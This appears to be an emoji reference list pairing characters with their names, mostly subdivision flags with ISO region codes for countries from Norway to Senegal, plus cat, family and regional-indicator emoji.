🇼 Regional Indicator Symbol Letter W
🇽 Regional Indicator Symbol Letter X
🇾 Regional Indicator Symbol Letter Y
🇿 Regional Indicator Symbol Letter Z
🐱🐉 Dino Cat
🐱🚀 Astro Cat
🐱👤 Ninja Cat
🐱💻 Hacker Cat
🐱🏍 Stunt Cat
🐱👓 Hipster Cat
◯◯◯◯◯ Olympic Rings
🏴 Flag for Baiti (NR-05)
🏴 Flag for Nord-Trøndelag (NO-17)
🏴 Flag for Hordaland (NO-12)
🏴 Flag for Akershus (NO-02)
🏴 Flag for Sør-Trøndelag (NO-16)
🏴 Flag for Telemark (NO-08)
🏴 Flag for Utrecht (NL-UT)
🏴 Flag for Møre og Romsdal (NO-15)
🏴 Flag for Svalbard (NO-21)
🏴 Flag for Purwanchal (NP-4)
🏴 Flag for Central (NP-1)
🏴 Flag for Oslo (NO-03)
🏴 Flag for Boe (NR-06)
👨🏾👨🏾👦🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for North Brabant (NL-NB)
🏴 Flag for Aust-Agder (NO-09)
🏴 Flag for Anabar (NR-02)
🏴 Flag for Limburg (NL-LI)
🏴 Flag for Buskerud (NO-06)
🏴 Flag for Hedmark (NO-04)
🏴 Flag for Vestfold (NO-07)
🏴 Flag for Anibare (NR-04)
🏴 Flag for Finnmark (NO-20)
🏴 Flag for Overijssel (NL-OV)
🏴 Flag for Rogaland (NO-11)
🏴 Flag for Østfold (NO-01)
🏴 Flag for Aiwo (NR-01)
🏴 Flag for Zeeland (NL-ZE)
🏴 Flag for Buada (NR-07)
🏴 Flag for Troms (NO-19)
🏴 Flag for Oppland (NO-05)
🏴 Flag for Madhya Pashchimanchal (NP-2)
🏴 Flag for Anetan (NR-03)
🏴 Flag for Western (NP-3)
🏴 Flag for Jan Mayen (NO-22)
🏴 Flag for Nordland (NO-18)
🏴 Flag for Bocas del Toro (PA-1)
🏴 Flag for Colón (PA-3)
🏴 Flag for Ad Dakhiliyah (OM-DA)
🏴 Flag for Muscat (OM-MA)
🏴 Flag for Ewa (NR-09)
🏴 Flag for Taranaki (NZ-TKI)
🏴 Flag for Ijuw (NR-10)
🏴 Flag for West Coast (NZ-WTC)
🏴 Flag for Southland (NZ-STL)
🏴 Flag for Tasman (NZ-TAS)
🏴 Flag for Manawatu-Wanganui (NZ-MWT)
🏴 Flag for Waikato (NZ-WKO)
🏴 Flag for Marl (NZ-MBH)
🏴 Flag for Bay of Plenty (NZ-BOP)
🏴 Flag for Nibok (NR-12)
🏴 Flag for Al Buraimi (OM-BU)
🏴 Flag for Auckland (NZ-AUK)
🏴 Flag for Janub ash Sharqiyah (OM-SJ)
🏴 Flag for Shamal ash Sharqiyah (OM-SS)
🏴 Flag for Coclé (PA-2)
🏴 Flag for Meneng (NR-11)
🏴 Flag for West Panamá (PA-10)
🏴 Flag for Ad Dhahirah (OM-ZA)
🏴 Flag for Northland (NZ-NTL)
🏴 Flag for Canterbury (NZ-CAN)
🏴 Flag for Gisborne (NZ-GIS)
🏴 Flag for Chatham Islands (NZ-CIT)
🏴 Flag for Uaboe (NR-13)
🏴 Flag for Denigomodu (NR-08)
🏴 Flag for Musandam (OM-MU)
🏴 Flag for Shamal al Batinah (OM-BS)
🏴 Flag for Hawke’s Bay (NZ-HKB)
🏴 Flag for Otago (NZ-OTA)
🏴 Flag for Janub al Batinah (OM-BJ)
🏴 Flag for Dhofar (OM-ZU)
🏴 Flag for Darién (PA-5)
🏴 Flag for El Callao (PE-CAL)
🏴 Flag for Herrera (PA-6)
🏴 Flag for Guna Yala (PA-KY)
🏴 Flag for Emberá (PA-EM)
🏴 Flag for La Libertad (PE-LAL)
🏴 Flag for Veraguas (PA-9)
🏴 Flag for Loreto (PE-LOR)
🏴 Flag for Amazonas (PE-AMA)
🏴 Flag for Chiriquí (PA-4)
🏴 Flag for Chimbu (PG-CPK)
🏴 Flag for Eastern Highlands (PG-EHG)
🏴 Flag for San Martín (PE-SAM)
🏴 Flag for Junín (PE-JUN)
🏴 Flag for Huánuco (PE-HUC)
🏴 Flag for Pasco (PE-PAS)
🏴 Flag for Ngöbe-Buglé (PA-NB)
🏴 Flag for Cajamarca (PE-CAJ)
🏴 Flag for Ica (PE-ICA)
🏴 Flag for Lima Region (PE-LIM)
🏴 Flag for Moquegua (PE-MOQ)
🏴 Flag for Puno (PE-PUN)
🏴 Flag for Ucayali (PE-UCA)
🏴 Flag for Lima (PE-LMA)
🏴 Flag for Piura (PE-PIU)
🏴 Flag for Tumbes (PE-TUM)
🏴 Flag for Cusco (PE-CUS)
🏴 Flag for Panamá (PA-8)
🏴 Flag for Tacna (PE-TAC)
🏴 Flag for Central (PG-CPM)
🏴 Flag for Los Santos (PA-7)
🏴 Flag for Lambayeque (PE-LAM)
🏴 Flag for Huancavelica (PE-HUV)
🏴 Flag for Ancash (PE-ANC)
🏴 Flag for Hela (PG-HLA)
🏴 Flag for Port Moresby (PG-NCD)
🏴 Flag for Islamabad (PK-IS)
🏴 Flag for Metro Manila (PH-00)
🏴 Flag for Bicol (PH-05)
🏴 Flag for Gulf (PG-GPK)
🏴 Flag for Zamboanga Peninsula (PH-09)
🏴 Flag for Bougainville (PG-NSB)
🏴 Flag for Gilgit-Baltistan (PK-GB)
🏴 Flag for Madang (PG-MPM)
🏴 Flag for Western (FJ-W)
🏴 Flag for Soccsksargen (PH-12)
🏴 Flag for Eastern Visayas (PH-08)
🏴 Flag for Enga (PG-EPW)
🏴 Flag for Milne Bay (PG-MBA)
🏴 Flag for Calabarzon (PH-40)
🏴 Flag for Jiwaka (PG-JWK)
🏴 Flag for Cagayan Valley (PH-02)
👨🏿👨🏿👦🏿👧🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Morobe (PG-MPL)
🏴 Flag for Northern Mindanao (PH-10)
🏴 Flag for Mimaropa (PH-41)
🏴 Flag for Balochistan (PK-BA)
🏴 Flag for Caraga (PH-13)
🏴 Flag for East Sepik (PG-ESW)
🏴 Flag for Western Visayas (PH-06)
🏴 Flag for Central Luzon (PH-03)
🏴 Flag for Muslim Mindanao (PH-14)
🏴 Flag for Southern Highlands (PG-SHM)
🏴 Flag for Western (PG-WPD)
🏴 Flag for Sandaun (PG-SAN)
🏴 Flag for New Ireland (PG-NIK)
🏴 Flag for Oro (PG-NPP)
🏴 Flag for Manus (PG-MRL)
🏴 Flag for Western Highlands (PG-WHM)
🏴 Flag for Davao (PH-11)
🏴 Flag for Punjab (PK-PB)
🏴 Flag for Federal Capital Territory (PL-PM)
🏴 Flag for Silesia (PL-SL)
🏴 Flag for Kuyavian-Pomerania (PL-KP)
🏴 Flag for Tubas (PS-TBS)
🏴 Flag for Ramallah and al-Bireh (PS-RBH)
🏴 Flag for Gaza (PS-GZA)
🏴 Flag for Rafah (PS-RFH)
🏴 Flag for Hebron (PS-HBN)
🏴 Flag for Podlaskie (PL-PD)
🏴 Flag for Subcarpathia (PL-PK)
🏴 Flag for Jenin (PS-JEN)
🏴 Flag for Lower Silesian (PL-DS)
🏴 Flag for Khan Yunis (PS-KYS)
🏴 Flag for Łódź (PL-LD)
🏴 Flag for North Gaza (PS-NGZ)
🏴 Flag for West Pomerania (PL-ZP)
🏴 Flag for Azad Kashmir (PK-JK)
🏴 Flag for Salfit (PS-SLT)
🏴 Flag for Mazovia (PL-MZ)
🏴 Flag for Lesser Poland (PL-MA)
🏴 Flag for Qalqilya (PS-QQA)
🏴 Flag for Aveiro (PT-01)
🏴 Flag for Greater Poland (PL-WP)
🏴 Flag for Opole (PL-OP)
🏴 Flag for Bethlehem (PS-BTH)
🏴 Flag for Khyber Pakhtunkhwa (PK-KP)
🏴 Flag for Tulkarm (PS-TKM)
🏴 Flag for Nablus (PS-NBS)
🏴 Flag for Warmian-Masuria (PL-WN)
🏴 Flag for Jericho (PS-JRH)
🏴 Flag for Sindh (PK-SD)
🏴 Flag for Lublin (PL-LU)
🏴 Flag for Jerusalem (PS-JEM)
🏴 Flag for Lubusz (PL-LB)
🏴 Flag for Świętokrzyskie (PL-SK)
🏴 Flag for Melekeok (PW-212)
🏴 Flag for Faro (PT-08)
🏴 Flag for Central (PY-11)
🏴 Flag for Évora (PT-07)
🏴 Flag for Ngiwal (PW-228)
🏴 Flag for Ñeembucú (PY-12)
🏴 Flag for Viana do Castelo (PT-16)
🏴 Flag for Lisbon (PT-11)
🏴 Flag for Presidente Hayes (PY-15)
🏴 Flag for Vila Real (PT-17)
🏴 Flag for Viseu (PT-18)
🏴 Flag for Airai (PW-004)
🏴 Flag for Amambay (PY-13)
🏴 Flag for Ngatpang (PW-224)
🏴 Flag for Coimbra (PT-06)
🏴 Flag for Portalegre (PT-12)
🏴 Flag for Peleliu (PW-350)
🏴 Flag for Ngardmau (PW-222)
🏴 Flag for Ngaraard (PW-214)
🏴 Flag for Canindeyú (PY-14)
🏴 Flag for Angaur (PW-010)
🏴 Flag for Sonsorol (PW-370)
🏴 Flag for Bragança (PT-04)
🏴 Flag for Castelo Branco (PT-05)
🏴 Flag for Santarém (PT-14)
🏴 Flag for Braga (PT-03)
🏴 Flag for Hatohobei (PW-050)
🏴 Flag for Koror (PW-150)
🏴 Flag for Alto Paraná (PY-10)
🏴 Flag for Ngeremlengui (PW-227)
🏴 Flag for Leiria (PT-10)
🏴 Flag for Porto (PT-13)
🏴 Flag for Setúbal (PT-15)
🏴 Flag for Aimeliik (PW-002)
🏴 Flag for Ngchesar (PW-226)
🏴 Flag for Guarda (PT-09)
🏴 Flag for San Pedro (PY-2)
🏴 Flag for Caaguazú (PY-5)
🏴 Flag for Guairá (PY-4)
🏴 Flag for Bacău (RO-BC)
🏴 Flag for Itapúa (PY-7)
🏴 Flag for Caraș-Severin (RO-CS)
🏴 Flag for Caazapá (PY-6)
🏴 Flag for Al Khor (QA-KH)
🏴 Flag for Covasna (RO-CV)
🏴 Flag for Alba (RO-AB)
🏴 Flag for Doha (QA-DA)
🏴 Flag for Dolj (RO-DJ)
🏴 Flag for Cordillera (PY-3)
🏴 Flag for Madinat ash Shamal (QA-MS)
🏴 Flag for Bihor (RO-BH)
🏴 Flag for Harghita (RO-HR)
🏴 Flag for Brăila (RO-BR)
🏴 Flag for Argeș (RO-AG)
🏴 Flag for Al Daayen (QA-ZA)
🏴 Flag for Bistriţa-Năsăud (RO-BN)
🏴 Flag for Călărași (RO-CL)
🏴 Flag for Asunción (PY-ASU)
🏴 Flag for Concepción (PY-1)
🏴 Flag for Botoşani (RO-BT)
🏴 Flag for Galați (RO-GL)
🏴 Flag for Giurgiu (RO-GR)
🏴 Flag for Boquerón (PY-19)
🏴 Flag for Misiones (PY-8)
🏴 Flag for Bucharest (RO-B)
🏴 Flag for Paraguarí (PY-9)
🏴 Flag for Al Rayyan (QA-RA)
🏴 Flag for Constanța (RO-CT)
🏴 Flag for Hunedoara (RO-HD)
🏴 Flag for Dâmbovița (RO-DB)
🏴 Flag for Arad (RO-AR)
🏴 Flag for Cluj (RO-CJ)
🏴 Flag for Buzău (RO-BZ)
🏴 Flag for Al Wakrah (QA-WA)
🏴 Flag for Vâlcea (RO-VL)
🏴 Flag for Iași (RO-IS)
🏴 Flag for Mehedinți (RO-MH)
🏴 Flag for Kosovo-Metohija (RS-KM)
🏴 Flag for Ialomița (RO-IL)
🏴 Flag for Teleorman (RO-TR)
🏴 Flag for Šumadija (RS-12)
🏴 Flag for Nišava (RS-20)
🏴 Flag for Altai (RU-AL)
🏴 Flag for Vrancea (RO-VN)
🏴 Flag for Vaslui (RO-VS)
🏴 Flag for Ilfov (RO-IF)
🏴 Flag for Mačva (RS-08)
🏴 Flag for Kolubara (RS-09)
🏴 Flag for Prahova (RO-PH)
🏴 Flag for Braničevo (RS-11)
🏴 Flag for Beograd (RS-00)
🏴 Flag for Zaječar (RS-15)
🏴 Flag for Moravica (RS-17)
🏴 Flag for Pomoravlje (RS-13)
🏴 Flag for Olt (RO-OT)
🏴 Flag for Satu Mare (RO-SM)
🏴 Flag for Toplica (RS-21)
🏴 Flag for Sălaj (RO-SJ)
🏴 Flag for Mureş (RO-MS)
🏴 Flag for Pirot (RS-22)
🏴 Flag for Rasina (RS-19)
🏴 Flag for Pčinja (RS-24)
🏴 Flag for Maramureş (RO-MM)
🏴 Flag for Suceava (RO-SV)
🏴 Flag for Raška (RS-18)
🏴 Flag for Bor (RS-14)
🏴 Flag for Podunavlje (RS-10)
🏴 Flag for Neamţ (RO-NT)
🏴 Flag for Zlatibor (RS-16)
🏴 Flag for Vojvodina (RS-VO)
🏴 Flag for Jablanica (RS-23)
🏴 Flag for Tulcea (RO-TL)
🏴 Flag for Adygea (RU-AD)
🏴 Flag for Timiș (RO-TM)
👩🏼👦🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Karachay-Cherkess (RU-KC)
🏴 Flag for Khakassia (RU-KK)
🏴 Flag for Buryat (RU-BU)
🏴 Flag for Kalmykia (RU-KL)
🏴 Flag for Belgorod (RU-BEL)
🏴 Flag for Khanty-Mansi (RU-KHM)
🏴 Flag for Leningrad (RU-LEN)
🏴 Flag for Kurgan (RU-KGN)
🏴 Flag for Ivanovo (RU-IVA)
🏴 Flag for Ingushetia (RU-IN)
🏴 Flag for Kirov (RU-KIR)
🏴 Flag for Krasnodar Krai (RU-KDA)
🏴 Flag for Karelia (RU-KR)
🏴 Flag for Magadan (RU-MAG)
🏴 Flag for Krasnoyarsk Krai (RU-KYA)
🏴 Flag for Kemerovo (RU-KEM)
🏴 Flag for Astrakhan (RU-AST)
🏴 Flag for Amur (RU-AMU)
🏴 Flag for Mordovia (RU-MO)
🏴 Flag for Komi (RU-KO)
🏴 Flag for Chelyabinsk (RU-CHE)
🏴 Flag for Khabarovsk Krai (RU-KHA)
🏴 Flag for Kursk (RU-KRS)
🏴 Flag for Mari El (RU-ME)
🏴 Flag for Chukotka Okrug (RU-CHU)
🏴 Flag for Kaliningrad (RU-KGD)
🏴 Flag for Irkutsk (RU-IRK)
🏴 Flag for Kaluga (RU-KLU)
🏴 Flag for Kabardino-Balkar (RU-KB)
🏴 Flag for Lipetsk (RU-LIP)
🏴 Flag for Bashkortostan (RU-BA)
🏴 Flag for Chuvash (RU-CU)
🏴 Flag for Kamchatka Krai (RU-KAM)
🏴 Flag for Kostroma (RU-KOS)
🏴 Flag for Sakhalin (RU-SAK)
🏴 Flag for Tver (RU-TVE)
🏴 Flag for Novosibirsk (RU-NVS)
🏴 Flag for Vladimir (RU-VLA)
🏴 Flag for Oryol (RU-ORL)
🏴 Flag for Stavropol Krai (RU-STA)
🏴 Flag for Nizhny Novgorod (RU-NIZ)
🏴 Flag for Saratov (RU-SAR)
🏴 Flag for Orenburg (RU-ORE)
🏴 Flag for Nenets (RU-NEN)
🏴 Flag for Volgograd (RU-VGG)
🏴 Flag for Tomsk (RU-TOM)
🏴 Flag for Sverdlovsk (RU-SVE)
🏴 Flag for Saint Petersburg (RU-SPE)
🏴 Flag for Yamalo-Nenets Okrug (RU-YAN)
🏴 Flag for Sakha (RU-SA)
🏴 Flag for Moscow (RU-MOW)
🏴 Flag for Penza (RU-PNZ)
🏴 Flag for Smolensk (RU-SMO)
🏴 Flag for Tatarstan (RU-TA)
🏴 Flag for Vologda (RU-VLG)
🏴 Flag for Tula (RU-TUL)
🏴 Flag for Yaroslavl (RU-YAR)
🏴 Flag for Tyumen (RU-TYU)
🏴 Flag for Pskov (RU-PSK)
🏴 Flag for Udmurt (RU-UD)
🏴 Flag for Samara (RU-SAM)
🏴 Flag for Ulyanovsk (RU-ULY)
🏴 Flag for Ryazan (RU-RYA)
🏴 Flag for Omsk (RU-OMS)
🏴 Flag for Perm Krai (RU-PER)
🏴 Flag for Voronezh (RU-VOR)
🏴 Flag for Novgorod (RU-NGR)
🏴 Flag for Tambov (RU-TAM)
🏴 Flag for Tuva (RU-TY)
🏴 Flag for Rostov (RU-ROS)
🏴 Flag for Murmansk (RU-MUR)
🏴 Flag for Kigali (RW-01)
🏴 Flag for Anse Etoile (SC-03)
🏴 Flag for Isabel (SB-IS)
🏴 Flag for Anse Boileau (SC-02)
🏴 Flag for Tabuk (SA-07)
🏴 Flag for Guadalcanal (SB-GU)
🏴 Flag for Northern (RW-03)
🏴 Flag for Southern (RW-05)
🏴 Flag for Central (SB-CE)
🏴 Flag for Ha’il (SA-06)
🏴 Flag for Bel Air (SC-09)
🏴 Flag for Malaita (SB-ML)
🏴 Flag for Najran (SA-10)
🏴 Flag for Al Jawf (SA-12)
🏴 Flag for Honiara (SB-CT)
🏴 Flag for Western (SB-WE)
🏴 Flag for Northern Borders (SA-08)
🏴 Flag for Riyadh (SA-01)
🏴 Flag for Rennell and Bellona (SB-RB)
🏴 Flag for Au Cap (SC-04)
🏴 Flag for Eastern (RW-02)
🏴 Flag for Anse Royale (SC-05)
🏴 Flag for Jewish (RU-YEV)
🏴 Flag for Bel Ombre (SC-10)
🏴 Flag for Al-Qassim (SA-05)
🏴 Flag for Temotu (SB-TE)
🏴 Flag for Baie Sainte Anne (SC-07)
🏴 Flag for Choiseul (SB-CH)
🏴 Flag for Western (RW-04)
🏴 Flag for Makira-Ulawa (SB-MK)
🏴 Flag for Makkah (SA-02)
🏴 Flag for Jizan (SA-09)
🏴 Flag for Anse aux Pins (SC-01)
🏴 Flag for Eastern (SA-04)
🏴 Flag for Asir (SA-14)
🏴 Flag for Zabaykalsky Krai (RU-ZAB)
🏴 Flag for Beau Vallon (SC-08)
🏴 Flag for Al Madinah (SA-03)
🏴 Flag for Baie Lazare (SC-06)
🏴 Flag for Plaisance (SC-19)
🏴 Flag for Södermanland (SE-D)
🏴 Flag for La Rivière Anglaise (SC-16)
🏴 Flag for Saint Louis (SC-22)
🏴 Flag for Mont Fleuri (SC-18)
🏴 Flag for Northern (SD-NO)
🏴 Flag for Grand’Anse Mahé (SC-13)
🏴 Flag for Takamaka (SC-23)
🏴 Flag for West Darfur (SD-DW)
🏴 Flag for Al Qadarif (SD-GD)
🏴 Flag for South Darfur (SD-DS)
🏴 Flag for River Nile (SD-NR)
🏴 Flag for West Kurdufan (SD-GK)
🏴 Flag for Kassala (SD-KA)
🏴 Flag for Khartoum (SD-KH)
🏴 Flag for La Digue (SC-15)
🏴 Flag for Les Mamelles (SC-24)
🏴 Flag for Port Glaud (SC-21)
🏴 Flag for Västerbotten (SE-AC)
🏴 Flag for Jönköping (SE-F)
🏴 Flag for Stockholm (SE-AB)
🏴 Flag for Glacis (SC-12)
🏴 Flag for Pointe La Rue (SC-20)
🏴 Flag for White Nile (SD-NW)
🏴 Flag for Al Jazirah (SD-GZ)
🏴 Flag for Östergötland (SE-E)
🏴 Flag for Norrbotten (SE-BD)
🏴 Flag for Uppsala (SE-C)
🏴 Flag for Mont Buxton (SC-17)
🏴 Flag for Grand’Anse Praslin (SC-14)
🏴 Flag for South Kurdufan (SD-KS)
🏴 Flag for Cascade (SC-11)
🏴 Flag for North Kurdufan (SD-KN)
🏴 Flag for Sennar (SD-SI)
🏴 Flag for East Darfur (SD-DE)
🏴 Flag for Blue Nile (SD-NB)
🏴 Flag for North Darfur (SD-DN)
🏴 Flag for Central Darfur (SD-DC)
🏴 Flag for Västmanland (SE-U)
🏴 Flag for Värmland (SE-S)
🏴 Flag for Črnomelj (SI-017)
🏴 Flag for Västernorrland (SE-Y)
🏴 Flag for South West (SG-05)
🏴 Flag for Črna na Koroškem (SI-016)
🏴 Flag for Västra Götaland (SE-O)
🏴 Flag for Gävleborg (SE-X)
🏴 Flag for North East (SG-02)
🏴 Flag for Brda (SI-007)
🏴 Flag for Kalmar (SE-H)
🏴 Flag for Destrnik (SI-018)
🏴 Flag for Beltinci (SI-002)
🏴 Flag for Bohinj (SI-004)
🏴 Flag for Brežice (SI-009)
🏴 Flag for North West (SG-03)
🏴 Flag for Ascension Island (SH-AC)
👩🏽👦🏽👶🏽 Family - Woman: Medium Skin Tone, Boy: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Cerklje na Gorenjskem (SI-012)
🏴 Flag for Cerknica (SI-013)
🏴 Flag for Bovec (SI-006)
🏴 Flag for Črenšovci (SI-015)
🏴 Flag for Kronoberg (SE-G)
🏴 Flag for Ajdovščina (SI-001)
🏴 Flag for Tišina (SI-010)
🏴 Flag for South East (SG-04)
🏴 Flag for Brezovica (SI-008)
🏴 Flag for Saint Helena (SH-HL)
🏴 Flag for Jämtland (SE-Z)
🏴 Flag for Gotland (SE-I)
🏴 Flag for Dalarna (SE-W)
🏴 Flag for Blekinge (SE-K)
🏴 Flag for Borovnica (SI-005)
🏴 Flag for Tristan da Cunha (SH-TA)
🏴 Flag for Bled (SI-003)
🏴 Flag for Cerkno (SI-014)
🏴 Flag for Örebro (SE-T)
🏴 Flag for Domžale (SI-023)
🏴 Flag for Izola (SI-040)
🏴 Flag for Kuzma (SI-056)
🏴 Flag for Dravograd (SI-025)
🏴 Flag for Duplek (SI-026)
🏴 Flag for Jesenice (SI-041)
🏴 Flag for Gorišnica (SI-028)
🏴 Flag for Gornja Radgona (SI-029)
🏴 Flag for Dobrepolje (SI-020)
🏴 Flag for Gornji Petrovci (SI-031)
🏴 Flag for Dornava (SI-024)
🏴 Flag for Hrastnik (SI-034)
🏴 Flag for Ivančna Gorica (SI-039)
🏴 Flag for Komen (SI-049)
🏴 Flag for Kozje (SI-051)
🏴 Flag for Divača (SI-019)
🏴 Flag for Idrija (SI-036)
🏴 Flag for Kidričevo (SI-045)
🏴 Flag for Kobarid (SI-046)
🏴 Flag for Kobilje (SI-047)
🏴 Flag for Koper (SI-050)
🏴 Flag for Ig (SI-037)
🏴 Flag for Kungota (SI-055)
🏴 Flag for Grosuplje (SI-032)
🏴 Flag for Dobrova–Polhov Gradec (SI-021)
🏴 Flag for Juršinci (SI-042)
🏴 Flag for Krško (SI-054)
🏴 Flag for Šalovci (SI-033)
🏴 Flag for Kranjska Gora (SI-053)
🏴 Flag for Kočevje (SI-048)
🏴 Flag for Ilirska Bistrica (SI-038)
🏴 Flag for Kamnik (SI-043)
🏴 Flag for Hrpelje–Kozina (SI-035)
🏴 Flag for Gornji Grad (SI-030)
🏴 Flag for Kanal (SI-044)
🏴 Flag for Dol pri Ljubljani (SI-022)
🏴 Flag for Pesnica (SI-089)
🏴 Flag for Piran (SI-090)
🏴 Flag for Mežica (SI-074)
🏴 Flag for Muta (SI-081)
🏴 Flag for Ljubno (SI-062)
🏴 Flag for Ormož (SI-087)
🏴 Flag for Postojna (SI-094)
🏴 Flag for Mislinja (SI-076)
👩🏾👦🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Majšperk (SI-069)
🏴 Flag for Mengeš (SI-072)
🏴 Flag for Metlika (SI-073)
🏴 Flag for Moravče (SI-077)
🏴 Flag for Moravske Toplice (SI-078)
🏴 Flag for Ljubljana (SI-061)
🏴 Flag for Murska Sobota (SI-080)
🏴 Flag for Naklo (SI-082)
🏴 Flag for Nova Gorica (SI-084)
🏴 Flag for Osilnica (SI-088)
🏴 Flag for Pivka (SI-091)
🏴 Flag for Nazarje (SI-083)
🏴 Flag for Miren–Kostanjevica (SI-075)
🏴 Flag for Logatec (SI-064)
🏴 Flag for Litija (SI-060)
🏴 Flag for Maribor (SI-070)
🏴 Flag for Ljutomer (SI-063)
🏴 Flag for Loški Potok (SI-066)
🏴 Flag for Luče (SI-067)
🏴 Flag for Podčetrtek (SI-092)
🏴 Flag for Podvelka (SI-093)
🏴 Flag for Medvode (SI-071)
🏴 Flag for Loška Dolina (SI-065)
🏴 Flag for Laško (SI-057)
🏴 Flag for Lendava (SI-059)
🏴 Flag for Mozirje (SI-079)
🏴 Flag for Lukovica (SI-068)
🏴 Flag for Tržič (SI-131)
🏴 Flag for Šentilj (SI-118)
🏴 Flag for Rače–Fram (SI-098)
🏴 Flag for Puconci (SI-097)
👩🏿👦🏿👶🏿 Family - Woman: Dark Skin Tone, Boy: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Rogašovci (SI-105)
🏴 Flag for Slovenska Bistrica (SI-113)
🏴 Flag for Rogatec (SI-107)
🏴 Flag for Ptuj (SI-096)
🏴 Flag for Šentjernej (SI-119)
🏴 Flag for Sežana (SI-111)
🏴 Flag for Škofljica (SI-123)
🏴 Flag for Slovenj Gradec (SI-112)
🏴 Flag for Starše (SI-115)
🏴 Flag for Sveti Jurij (SI-116)
🏴 Flag for Trebnje (SI-130)
🏴 Flag for Sevnica (SI-110)
🏴 Flag for Radeče (SI-099)
🏴 Flag for Škocjan (SI-121)
🏴 Flag for Šmarje pri Jelšah (SI-124)
🏴 Flag for Šoštanj (SI-126)
🏴 Flag for Štore (SI-127)
🏴 Flag for Rogaška Slatina (SI-106)
🏴 Flag for Preddvor (SI-095)
🏴 Flag for Turnišče (SI-132)
🏴 Flag for Radovljica (SI-102)
🏴 Flag for Ruše (SI-108)
🏴 Flag for Slovenske Konjice (SI-114)
🏴 Flag for Šentjur (SI-120)
🏴 Flag for Tolmin (SI-128)
🏴 Flag for Ribnica (SI-104)
🏴 Flag for Radlje ob Dravi (SI-101)
🏴 Flag for Trbovlje (SI-129)
🏴 Flag for Semič (SI-109)
🏴 Flag for Šenčur (SI-117)
🏴 Flag for Ravne na Koroškem (SI-103)
🏴 Flag for Miklavž na Dravskem Polju (SI-169)
🏴 Flag for Vodice (SI-138)
🏴 Flag for Velenje (SI-133)
🏴 Flag for Zagorje ob Savi (SI-142)
🏴 Flag for Vuzenica (SI-141)
🏴 Flag for Vrhnika (SI-140)
👩🏻👧🏻 Family - Woman: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Železniki (SI-146)
🏴 Flag for Žiri (SI-147)
🏴 Flag for Benedikt (SI-148)
🏴 Flag for Velike Lašče (SI-134)
🏴 Flag for Vitanje (SI-137)
🏴 Flag for Komenda (SI-164)
🏴 Flag for Dobrna (SI-155)
🏴 Flag for Dobrovnik (SI-156)
🏴 Flag for Dolenjske Toplice (SI-157)
🏴 Flag for Hajdina (SI-159)
🏴 Flag for Oplotnica (SI-171)
🏴 Flag for Videm (SI-135)
🏴 Flag for Jezersko (SI-163)
🏴 Flag for Cankova (SI-152)
🏴 Flag for Kostel (SI-165)
🏴 Flag for Križevci (SI-166)
🏴 Flag for Vojnik (SI-139)
🏴 Flag for Markovci (SI-168)
🏴 Flag for Mirna Peč (SI-170)
🏴 Flag for Vipava (SI-136)
🏴 Flag for Horjul (SI-162)
🏴 Flag for Cerkvenjak (SI-153)
🏴 Flag for Bloke (SI-150)
🏴 Flag for Zavrč (SI-143)
🏴 Flag for Bistrica ob Sotli (SI-149)
🏴 Flag for Zreče (SI-144)
🏴 Flag for Hodoš (SI-161)
🏴 Flag for Hoče–Slivnica (SI-160)
🏴 Flag for Grad (SI-158)
🏴 Flag for Podlehnik (SI-172)
🏴 Flag for Cirkulane (SI-196)
🏴 Flag for Prebold (SI-174)
🏴 Flag for Razkrižje (SI-176)
🏴 Flag for Veržej (SI-188)
🏴 Flag for Žalec (SI-190)
🏴 Flag for Solčava (SI-180)
🏴 Flag for Sveta Ana (SI-181)
🏴 Flag for Šempeter–Vrtojba (SI-183)
🏴 Flag for Trnovska Vas (SI-185)
🏴 Flag for Sodražica (SI-179)
🏴 Flag for Makole (SI-198)
🏴 Flag for Straža (SI-203)
🏴 Flag for Selnica ob Dravi (SI-178)
🏴 Flag for Žužemberk (SI-193)
🏴 Flag for Kostanjevica na Krki (SI-197)
🏴 Flag for Prevalje (SI-175)
🏴 Flag for Šmartno pri Litiji (SI-194)
🏴 Flag for Žetale (SI-191)
🏴 Flag for Vransko (SI-189)
🏴 Flag for Renče–Vogrsko (SI-201)
🏴 Flag for Središče ob Dravi (SI-202)
🏴 Flag for Trzin (SI-186)
🏴 Flag for Sveta Trojica v Slovenskih Goricah (SI-204)
🏴 Flag for Sveti Tomaž (SI-205)
🏴 Flag for Ribnica na Pohorju (SI-177)
🏴 Flag for Gorje (SI-207)
🏴 Flag for Tabor (SI-184)
🏴 Flag for Mokronog–Trebelno (SI-199)
🏴 Flag for Polzela (SI-173)
🏴 Flag for Poljčane (SI-200)
🏴 Flag for Apače (SI-195)
🏴 Flag for Velika Polana (SI-187)
🏴 Flag for Trnava (SK-TA)
🏴 Flag for Rečica ob Savinji (SI-209)
🏴 Flag for Serravalle (SM-09)
🏴 Flag for Chiesanuova (SM-02)
🏴 Flag for Kaffrine (SN-KA)
🏴 Flag for Nitra (SK-NI)
🏴 Flag for Šentrupert (SI-211)
🏴 Flag for Borgo Maggiore (SM-06)
🏴 Flag for Košice (SK-KI)
🏴 Flag for Banská Bystrica (SK-BC)
🏴 Flag for Montegiardino (SM-08)
🏴 Flag for Dakar (SN-DK)
🏴 Flag for Prešov (SK-PV)
🏴 Flag for Mirna (SI-212)
🏴 Flag for Fiorentino (SM-05)
🏴 Flag for Thiès (SN-TH)
🏴 Flag for Ankaran (SI-213)
🏴 Flag for Tambacounda (SN-TC)
🏴 Flag for Fatick (SN-FK)
🏴 Flag for Trenčín (SK-TC)
🏴 Flag for Kaolack (SN-KL)
🏴 Flag for Faetano (SM-04)
🏴 Flag for Žilina (SK-ZI)
🏴 Flag for Southern (SL-S)
🏴 Flag for Sédhiou (SN-SE)
🏴 Flag for Bratislava (SK-BL)
🏴 Flag for Diourbel (SN-DB)
🏴 Flag for Kédougou (SN-KE)
🏴 Flag for Northern (SL-N)
🏴 Flag for Western Area (SL-W)
🏴 Flag for Matam (SN-MT)
